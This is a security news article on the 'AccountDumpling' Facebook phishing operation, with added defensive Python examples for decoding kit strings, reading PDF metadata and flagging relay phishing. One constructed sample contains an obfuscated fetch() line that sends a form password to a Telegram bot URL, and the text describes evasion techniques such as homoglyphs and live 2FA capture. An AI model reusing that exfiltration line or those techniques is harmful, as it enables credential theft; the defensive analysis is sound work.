A sophisticated Vietnamese-linked phishing operation dubbed “AccountDumpling” has compromised more than 30,000 Facebook accounts by exploiting Google’s AppSheet platform as an authenticated email relay, creating phishing messages that bypassed spam filters and appeared completely legitimate to victims.
Guardio Labs security researcher Shaked Chen publicly disclosed the operation on April 29, 2026, revealing one of the most technically advanced Facebook account-hijacking campaigns ever documented.
Unlike conventional phishing attacks that rely on spoofed sender addresses and shady SMTP servers, AccountDumpling weaponizes Google AppSheet, a legitimate no-code app builder, to send phishing emails from noreply@appsheet.com through appsheet.bounces.google.com.
The result: every message fully passed SPF, DKIM, and DMARC authentication checks, making them indistinguishable from trusted Google communications to both email clients and security tools. The scheme is not just a phishing campaign; it is a criminal supply chain.
Stolen Facebook credentials are funneled in real time to Telegram bots, after which compromised accounts are resold through a storefront operated by the same threat actors who stole them. In a particularly cynical twist, the operation also offers “account recovery” services to the very victims it defrauded.
Four Attack Clusters, One Target
Guardio mapped four distinct attack clusters, each using different social engineering lures but sharing the same Google-authenticated delivery infrastructure.
- Cluster A – Netlify-hosted fake Facebook Help Center: Victims received urgent DMCA or policy-violation warnings and were redirected to fake Facebook appeal pages on Netlify. Each victim received a unique subdomain to evade URL blocklists. These pages collected not just usernames and passwords but also dates of birth, phone numbers, and photos of government-issued IDs, enabling full identity takeover.
- Cluster B – Vercel-hosted “Blue Badge” reward traps: Instead of threats, this cluster offered rewards: fake blue-badge verifications, advertiser bonuses, and account checkups. Pages on Vercel included fake reCAPTCHA, countdown timers, anti-debugging scripts, and language localization across 30+ languages. Cyrillic homoglyphs replaced Latin characters in brand names to defeat string-based detection.
- Cluster C – Google Drive PDF with live operator control: This was the most technically advanced vector. Victims clicked a Google Drive link containing a Canva-generated PDF with an embedded redirect to a Socket.IO-based phishing panel. The panel gave a live human operator real-time WebSocket control over the victim’s session, capable of injecting incorrect password responses, collecting 2FA codes, and capturing browser screenshots via html2canvas.
- Cluster D – Fake recruiter impersonation: Emails impersonated recruiters from Meta, WhatsApp, Adobe, Apple, and Ray-Ban. Rather than directing victims to a phishing page, attackers initiated conversations that shifted to attacker-controlled channels, building trust gradually before extracting credentials.
Inside the Telegram C2 Infrastructure
Across Clusters A and B, Guardio identified four Telegram bots wired into the credential exfiltration pipeline. Bot tokens and chat IDs were hidden in obfuscated JavaScript using hex-escaped constants, but researchers decoded the configuration and traced the data flows directly into private Telegram channels.
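The decoding step described here is routine kit forensics: the string constants are only hidden from a text search, not encrypted. The following is an added example for this article, not Guardio's tooling. The JavaScript it analyzes is constructed to mimic the hex-escaped style (`\xNN` one byte at a time); the bot token and chat ID in it are placeholders, not the values from the report, and the URL shape (`api.telegram.org/bot<token>/sendMessage?chat_id=`) is the public Telegram Bot API format.

```python
"""Recover hex-escaped string constants from a phishing-kit JavaScript file and
pull out the Telegram exfiltration indicators (bot token, chat ID) a defender
needs for blocking, takedown requests and victim notification.

Added example for the article; not Guardio's code. OBFUSCATED_JS is a
constructed stand-in, and the token/chat ID inside it are placeholders.
"""
import re

# Placeholder credentials (constructed): Telegram tokens look like
# <8-10 digits>:<35 chars>, chat IDs for channels are large negative integers.
PLACEHOLDER_TOKEN = "0000000000:" + "A" * 35
PLACEHOLDER_CHAT_ID = "-1000000000000"


def _hex_escape(text: str) -> str:
    """Write text as a JS string body made only of \\xNN escapes (the kit's trick)."""
    return "".join(f"\\x{ord(c):02x}" for c in text)


# Constructed sample: no readable 'telegram' or 'bot' anywhere in the source,
# which is exactly why a naive grep over the kit finds nothing.
OBFUSCATED_JS = (
    'var _0xa1 = "' + _hex_escape("https://api.telegram.org/bot") + '";\n'
    'var _0xa2 = "' + _hex_escape(PLACEHOLDER_TOKEN) + '";\n'
    'var _0xa3 = "' + _hex_escape("/sendMessage?chat_id=" + PLACEHOLDER_CHAT_ID + "&text=") + '";\n'
    "fetch(_0xa1 + _0xa2 + _0xa3 + encodeURIComponent(document.forms[0].pass.value));\n"
)

TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
CHAT_ID_RE = re.compile(r"chat_id=(-?\d+)")


def deobfuscate_js_strings(src: str) -> str:
    """Replace \\uNNNN and \\xNN escapes with the characters they encode."""
    src = re.sub(r"\\u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), src)
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), src)


def extract_telegram_indicators(src: str) -> dict:
    """Decode the source, then harvest Telegram C2 indicators from the plaintext."""
    plain = deobfuscate_js_strings(src)
    return {
        "uses_telegram_api": "api.telegram.org/bot" in plain,
        "bot_tokens": sorted(set(TOKEN_RE.findall(plain))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(plain))),
    }


if __name__ == "__main__":
    print(extract_telegram_indicators(OBFUSCATED_JS))
```

The decoded token is what you hand to Telegram's abuse channel and to your proxy blocklist; the chat ID is what lets investigators correlate separate kit files to the same receiving channel, which is how the article's per-bot victim counts were tied together.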
Victim record counts recovered from bot channel metadata totaled approximately 30,000 compromised accounts: roughly 2,900 from Bot-1, 11,000 from Bot-3, 4,000 from Bot-4, and 12,000 from a revoked Bot-2 channel.
Geographic analysis of the Bot-1 dataset found that 68.6% of victims were located in the United States, followed by Italy, Canada, the Philippines, India, Spain, Australia, the UK, Brazil, and Mexico, with over 50 countries represented.
Victim follow-ups confirmed account lockouts, business disruptions, credit card fraud, and significant financial losses, indicating that stolen PII was further circulated to dark-market buyers.
The investigation’s clearest attribution break came from a metadata oversight in Cluster C’s Google Drive PDF. Because the file was generated in Canva, the platform automatically embedded the creator’s account name in the /Author field, revealing a real Vietnamese name: Phạm Tài Tân.
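Reading the document-information dictionary is the check that surfaced that name, and it needs no PDF library: the trailer's `/Info` entry points at an object whose `/Author`, `/Creator` and `/Producer` strings are stored as plain `(...)` literals or `<...>` hex strings. The following is an added example for this article, not Guardio's tooling; the PDF bytes are constructed here and the `/Author` value is a placeholder, not the name from the report.

```python
"""Read /Author, /Creator, /Producer and /CreationDate out of a PDF's
document-information dictionary with the standard library only.

Added example for the article; not Guardio's code. SAMPLE_PDF is constructed
and its /Author is a placeholder.
"""
import re

# Backslash escapes allowed inside a PDF literal string (PDF 1.7, section 7.3.4.2).
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
            b"(": b"(", b")": b")", b"\\": b"\\"}

# Constructed minimal PDF: a Canva-style Info object with a UTF-16BE hex
# /Creator and an escaped-parenthesis /Producer to exercise both string forms.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj
<< /Author (Placeholder Kit Author)
   /Creator <FEFF00430061006E00760061>
   /Producer (Canva \\(constructed sample\\))
   /CreationDate (D:20260401120000Z) >>
endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
"""


def decode_pdf_string(raw: bytes) -> str:
    """Decode a PDF literal string (...) or hex string <...> to text."""
    if raw.startswith(b"<"):
        digits = re.sub(rb"\s", b"", raw[1:-1]).decode("ascii")
        data = bytes.fromhex(digits + ("0" if len(digits) % 2 else ""))
    else:
        def unescape(m):
            esc = m.group(1)
            return _ESCAPES.get(esc) or bytes([int(esc, 8) & 0xFF])  # \ddd octal
        data = re.sub(rb"\\([nrtbf()\\]|[0-7]{1,3})", unescape, raw[1:-1])
    # Text strings are UTF-16BE when they carry a BOM, else PDFDocEncoding (~Latin-1).
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be")
    return data.decode("latin-1")


def extract_info_dict(pdf: bytes) -> dict:
    """Return {field: text} from the object the trailer's /Info reference points to."""
    ref = re.search(rb"/Info\s+(\d+)\s+(\d+)\s+R", pdf)
    if not ref:
        return {}
    num, gen = ref.groups()
    obj = re.search(rb"(?<![0-9])" + num + rb"\s+" + gen + rb"\s+obj\b(.*?)\bendobj",
                    pdf, re.S)
    if not obj:
        return {}
    string = rb"\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>"
    fields = {}
    for m in re.finditer(rb"/([A-Za-z]+)\s*(" + string + rb")", obj.group(1), re.S):
        fields[m.group(1).decode("ascii")] = decode_pdf_string(m.group(2))
    return fields


if __name__ == "__main__":
    for key, value in extract_info_dict(SAMPLE_PDF).items():
        print(f"{key}: {value}")
```

Two caveats for real files: incrementally updated PDFs can carry several trailers, so take the last `/Info` reference, and object streams or encrypted documents need a full parser. For the investigator the lesson is the one the article draws: authoring tools write the account name into metadata by default, so `/Author` is worth checking on every lure document before anything else.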
Researchers quickly located a corresponding Facebook profile and a public-facing business website advertising Facebook “account unlocking” and “security” services.
Further corroborating evidence included Vietnamese-language developer comments in Cluster A’s HTML and Cluster B’s JavaScript, campaign timing consistent with Vietnam Standard Time working hours, and Telegram bot names carrying Vietnamese phonetic traces, including @tichxanhglobal_bot, where “Tích Xanh” translates to “blue checkmark” in Vietnamese.
A secondary signature, “Gatto Sazio,” found in newer Netlify serverless variants, suggests a separate kit developer, pointing to the operation’s modular structure: one actor builds the kit, another runs the campaign, and a third monetizes the stolen access.
AccountDumpling is a landmark case because it exposes a fundamental weakness in email authentication frameworks. SPF, DKIM, and DMARC were designed to verify the sending platform, not the trustworthiness of the message content, and attackers have learned to exploit that gap at an industrial scale.
KnowBe4 Threat Labs separately reported that on a single day in April 2025, over 10% of all global phishing emails it blocked were sent from AppSheet, confirming this is not an isolated technique but an evolving industry-wide abuse vector.
The operation’s monetization loop harvests credentials, hijacks accounts, sells access, and offers paid recovery, transforming stolen social media accounts into tradable commodities that fuel disinformation, fake storefronts, and identity laundering.
Guardio confirmed that additional Vietnamese-linked attack clusters tied to the same infrastructure are currently being analyzed and will be disclosed in future publications.
Indicators and Mitigation
Organizations and individual users can reduce exposure by taking the following steps:
- Verify all Meta-related emails by logging into Facebook directly, rather than clicking email links, regardless of the sender’s domain
- Treat noreply@appsheet.com emails about Meta or Facebook as suspicious unless you have an active AppSheet integration
- Enable Facebook’s advanced security features, including login alerts and trusted contacts, to limit the damage of credential theft
- Implement phishing-resistant MFA (hardware keys or passkeys) rather than SMS or TOTP codes, which Cluster B actively intercepted in real time
- Audit third-party no-code platforms in your organization for misconfigured notification workflows that could be abused as relay points
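The last two items, together with the Cluster B note about Cyrillic homoglyphs, translate into a mail-gateway rule: a message that authenticates for a no-code notification relay your tenant does not use, yet talks about another brand, is a phishing candidate no matter what SPF, DKIM and DMARC say. The following is an added example for this article and not a vendor rule or Guardio code. The two messages are constructed; the relay-domain list, brand list and lure-term list are assumptions to be tuned per tenant, and the `Authentication-Results` header is what a gateway would record for mail genuinely relayed by Google's AppSheet sender.

```python
"""Triage rule for authenticated-relay phishing: flag mail from a notification
relay the tenant has not integrated when it mentions an unrelated brand, after
folding Cyrillic look-alike letters back to Latin so keyword matching works.

Added example for the article. Messages are constructed; RELAY_SENDERS,
TARGET_BRANDS and LURE_TERMS are assumptions, not a published rule set.
"""
import email
import unicodedata
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

RELAY_SENDERS = {"appsheet.com"}                      # authenticates, carries user content
TARGET_BRANDS = {"facebook", "meta", "instagram", "whatsapp"}
LURE_TERMS = {"dmca", "policy violation", "appeal", "blue badge", "verification",
              "account recovery", "recruiter"}

# Cyrillic letters that render identically to Latin ones (subset of Unicode confusables).
HOMOGLYPHS = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
    "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T", "\u0425": "X",
})


def normalize(text: str) -> str:
    """NFKC-fold, swap Cyrillic look-alikes for Latin, lower-case."""
    return unicodedata.normalize("NFKC", text).translate(HOMOGLYPHS).lower()


def auth_passed(msg) -> bool:
    """True when the gateway's Authentication-Results shows spf, dkim and dmarc pass."""
    ar = " ".join(msg.get_all("Authentication-Results", [])).lower()
    return all(f"{m}=pass" in ar for m in ("spf", "dkim", "dmarc"))


def triage(raw: bytes, integrated_relays=frozenset()) -> dict:
    """Classify one RFC 5322 message. Authentication is recorded, never exculpatory."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    body = msg.get_body(preferencelist=("plain", "html"))
    text = normalize(msg.get("Subject", "") + "\n" + (body.get_content() if body else ""))
    brands = sorted(b for b in TARGET_BRANDS if b in text)
    lures = sorted(t for t in LURE_TERMS if t in text)
    reasons = []
    is_relay = domain in RELAY_SENDERS
    if is_relay and domain not in integrated_relays:
        reasons.append(f"sender {domain} is a notification relay this tenant does not use")
    if is_relay and brands:
        reasons.append(f"relay message impersonates {', '.join(brands)}")
    if lures:
        reasons.append(f"lure wording: {', '.join(lures)}")
    verdict = "suspicious" if (is_relay and brands) else ("review" if reasons else "ok")
    return {"verdict": verdict, "auth_passed": auth_passed(msg),
            "brands": brands, "lures": lures, "reasons": reasons}


def build_message(subject: str, body: str) -> bytes:
    """Constructed sample, serialized the way the MTA would hand it to a filter."""
    msg = EmailMessage()
    msg["From"] = "AppSheet <noreply@appsheet.com>"
    msg["To"] = "employee@example.com"
    msg["Subject"] = subject
    msg["Authentication-Results"] = ("mx.example.com; spf=pass smtp.mailfrom=appsheet.bounces.google.com; "
                                     "dkim=pass header.d=appsheet.com; dmarc=pass header.from=appsheet.com")
    msg.set_content(body)
    return msg.as_bytes()


# Lure text with Cyrillic a (U+0430) in "Facebook" and Cyrillic e (U+0435) in "Meta".
PHISH_RAW = build_message(
    "Urgent: policy violation notice for your Page",
    "We received a DMCA complaint against your F\u0430cebook Page. Your M\u0435ta Business "
    "account will be disabled in 24 hours unless you submit an appeal: https://example.invalid/",
)
LEGIT_RAW = build_message(
    "Inventory tracker: low stock",
    "Low stock alert: SKU 4471 is below its reorder threshold.",
)

if __name__ == "__main__":
    print(triage(PHISH_RAW))
    print(triage(LEGIT_RAW, integrated_relays={"appsheet.com"}))
```

Note that `auth_passed` is reported but never lowers the verdict: as the article stresses, the authentication chain verifies Google's relay, not the message's intent. A tenant with a genuine AppSheet workflow passes `integrated_relays={"appsheet.com"}` so its inventory notifications come back `ok` while a brand-impersonating message over the same relay still comes back `suspicious`.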
FAQ
Q1: How did the AccountDumpling phishing emails pass all spam filters?
Attackers abused Google AppSheet’s legitimate notification system, meaning emails were sent from Google’s own infrastructure (noreply@appsheet.com) and passed SPF, DKIM, and DMARC authentication signals that verify the sending platform, not the message’s intent.
Q2: What data did the attackers steal beyond passwords?
Beyond usernames and passwords, the phishing pages harvested dates of birth, phone numbers, government-issued ID photos, 2FA codes, and live browser screenshots, giving attackers everything needed to bypass platform recovery safeguards.
Q3: How were the stolen Facebook accounts monetized?
Compromised accounts were sold through an illicit storefront operated by the same threat actors, who also offered fake “account recovery” services to victims, creating a closed criminal-commercial loop that profited from both the theft and its aftermath.
Q4: Who is behind AccountDumpling?
Guardio Labs attributed the core operation to a Vietnamese-linked actor identified through PDF metadata containing the name Phạm Tài Tân, corroborated by Vietnamese-language code artifacts, Vietnam Standard Time activity patterns, and Telegram bot naming conventions.
Site: thecybrdef.com